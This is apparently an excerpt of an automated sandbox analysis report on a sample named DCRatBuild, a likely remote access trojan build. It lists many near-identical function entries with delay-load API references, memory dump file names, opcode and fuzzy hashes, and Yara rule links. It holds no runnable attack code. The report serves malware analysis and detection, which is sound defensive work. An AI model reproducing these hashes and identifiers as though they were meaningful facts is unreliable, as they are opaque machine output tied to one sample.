                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: e1388919ddfe34a95830612ae48eff627de467001b90ff2565479febbded6370
                                                                                                                        • Instruction ID: a62126bd9858990ebf10d36be9711d2152aa37056382cc0a8e003d8cb9c47e8e
                                                                                                                        • Opcode Fuzzy Hash: e1388919ddfe34a95830612ae48eff627de467001b90ff2565479febbded6370
                                                                                                                        • Instruction Fuzzy Hash: 7FB012E5258010FC3144A1171D82E37114CC1D7B11330C03FFD29C1080D94CEC01043E
                                                                                                                        Function 004AE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 0176692b75fa02e58125ea8ba25d8ba5b6b05467b87473bef60d1e75820f3786
                                                                                                                        • Instruction ID: 738cecbcee5dc358346d1d93a6fd5edde3330caaf9ba3c55ea79a3580f029ced
                                                                                                                        • Opcode Fuzzy Hash: 0176692b75fa02e58125ea8ba25d8ba5b6b05467b87473bef60d1e75820f3786
                                                                                                                        • Instruction Fuzzy Hash: 98B012E5269050FC314461071D82E37014DC5D6B11330803FF82AC1080D84CAC01043E
                                                                                                                        Function 004AE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 6ae1a49badd7fd174411046680491c7a1ed5350edbf6dbdc5c0a1cf63f231ccc
                                                                                                                        • Instruction ID: 005ba2413496e36b783f6d9db8a06d4ad6e4bd9f1a77ed4bf07d1f5c449dc415
                                                                                                                        • Opcode Fuzzy Hash: 6ae1a49badd7fd174411046680491c7a1ed5350edbf6dbdc5c0a1cf63f231ccc
                                                                                                                        • Instruction Fuzzy Hash: 84B012E5258010FC318462071E82E37010CC1D6B11330C03FF829C1180DD5CAD0A043E
                                                                                                                        Function 004AE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: ca677e3ebed228e96c26e7c5af4166f6b519d8dc1f08cebc5aac6d38d983ed95
                                                                                                                        • Instruction ID: 07a4582f068ed86d8450198d72b2f73a91574d404776f013f4d8c1860753c22f
                                                                                                                        • Opcode Fuzzy Hash: ca677e3ebed228e96c26e7c5af4166f6b519d8dc1f08cebc5aac6d38d983ed95
                                                                                                                        • Instruction Fuzzy Hash: 83B012E5358150FC31C462071D82E37010CC1D6B11330C13FF829C1180D94CAC45043E
                                                                                                                        Function 004AE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: bbdfa69825a9b478f9fbafcc5458d4841aeea8b64543571aec70422c8813d122
                                                                                                                        • Instruction ID: faa2a17d282a65b7e64d02958a6adfc824d13c5e388f23052b69dc58be1c10e8
                                                                                                                        • Opcode Fuzzy Hash: bbdfa69825a9b478f9fbafcc5458d4841aeea8b64543571aec70422c8813d122
                                                                                                                        • Instruction Fuzzy Hash: 1FB092A5258010BC314465075982E37110CC197B11330802FF829C1080984CA901043A
                                                                                                                        Function 004AE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 2c67db983abc739fb056b49d4f3f3212818f39dde6a90e1528f49972ae567188
                                                                                                                        • Instruction ID: 1729fc63a270b190ebf16586dbccc0204ae7b1b616e9e531e0b7d6ef64263f2b
                                                                                                                        • Opcode Fuzzy Hash: 2c67db983abc739fb056b49d4f3f3212818f39dde6a90e1528f49972ae567188
                                                                                                                        • Instruction Fuzzy Hash: 8EB012F5258110FC318465075D82E37010CC1D7F11330813FF829C1080D84CAD41043E
                                                                                                                        Function 004AE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 870fc307928b4b47672e9462a63d9ca566d31c3b3c3aa3b2445c04cb221ea6f0
                                                                                                                        • Instruction ID: 73dcaf186fd5ee304111d2e1c46cd0fb7101b9e020bc90b293305e50d76b50a4
                                                                                                                        • Opcode Fuzzy Hash: 870fc307928b4b47672e9462a63d9ca566d31c3b3c3aa3b2445c04cb221ea6f0
                                                                                                                        • Instruction Fuzzy Hash: 9BB012F5258010FC314465075D82E37010CC1D7F11330803FF829C1080D84CAD01043E
                                                                                                                        Function 004AE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: f6a45f85f4eb1a3c93a07b9a35e7809bc21f9525435b16b99f2eb4ae00c68e10
                                                                                                                        • Instruction ID: 1f9afdf21779866fc984463c07adf563169f2b1b6b3bdb53e02c2936c53bdac6
                                                                                                                        • Opcode Fuzzy Hash: f6a45f85f4eb1a3c93a07b9a35e7809bc21f9525435b16b99f2eb4ae00c68e10
                                                                                                                        • Instruction Fuzzy Hash: 55B012F5258010FC314465075E82E37010CC1D7F11330803FF829C1084DC4CAE02043E
                                                                                                                        Function 004AEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AEAF9
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 3Ro
                                                                                                                        • API String ID: 1269201914-1492261280
                                                                                                                        • Opcode ID: 7bb967eb2b45ea5c22760991a288b2a4af50cdfa52b990e80b3776ef7765726f
                                                                                                                        • Instruction ID: e5dd5fbcf1fa33e690d8f373d9e9f4929e4569238a6ab5143847fda2ab0dab03
                                                                                                                        • Opcode Fuzzy Hash: 7bb967eb2b45ea5c22760991a288b2a4af50cdfa52b990e80b3776ef7765726f
                                                                                                                        • Instruction Fuzzy Hash: 97B012CA39A0427C310472071E42D37010CC1E2B95330C02FF524C40C5DC8C0C02043E
                                                                                                                        Function 004AE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 18ab0966b77487b4ccb56e3491455a45eb776b622e8fbf1b394576ac9367afe4
                                                                                                                        • Instruction ID: b25e9d272ab7e0df187f40011037f5bdfbbc3bc762cad9c91699de136a67b537
                                                                                                                        • Opcode Fuzzy Hash: 18ab0966b77487b4ccb56e3491455a45eb776b622e8fbf1b394576ac9367afe4
                                                                                                                        • Instruction Fuzzy Hash: 14B012F5258010FC3144A1071E82E37018CC1D6B11330803FF829C1080DC4CED02043E
                                                                                                                        Function 004AE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 6383772b2da121cfca3b0169e27da531277e6c1807d00c948b65cca1ff3460bd
                                                                                                                        • Instruction ID: c4e6f96ed46a7637804b5871fd09c1640a4558e8eb1af71c5379f9556f8cc3d2
                                                                                                                        • Opcode Fuzzy Hash: 6383772b2da121cfca3b0169e27da531277e6c1807d00c948b65cca1ff3460bd
                                                                                                                        • Instruction Fuzzy Hash: 5BB012C5B591007C3244714B6D03E3B050CC1D7F1D330822FF428C1084EC4C0C45043E
                                                                                                                        Function 004AE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: ce8f1ffe534b8cd2b1399fdc30a7bef7d4e74f2ca6d869d9af26cbcb13d1e30a
                                                                                                                        • Instruction ID: 8833afda92ec8463508864170c3ef86111c7c271e18db1f4158f363fdc67adff
                                                                                                                        • Opcode Fuzzy Hash: ce8f1ffe534b8cd2b1399fdc30a7bef7d4e74f2ca6d869d9af26cbcb13d1e30a
                                                                                                                        • Instruction Fuzzy Hash: B5B012C5B5A0007C310431672D06E3B010CC1D3F1D330803FF534C0485AC4C4D05043E
                                                                                                                        Function 004AE593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 143a726b39b393d483d70884a666087891c2efe6d0b7e8e7ac2c557f0acb2b5b
                                                                                                                        • Instruction ID: 3cb79207efbb62435487e60ae3a9deb6df7adb225bf5733fa946433ac7153a08
                                                                                                                        • Opcode Fuzzy Hash: 143a726b39b393d483d70884a666087891c2efe6d0b7e8e7ac2c557f0acb2b5b
                                                                                                                        • Instruction Fuzzy Hash: 9CB012C5B580047D324861972E02E37010CC1D6B19330842FF428C20C0E84C0C01053E
                                                                                                                        Function 004AE5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
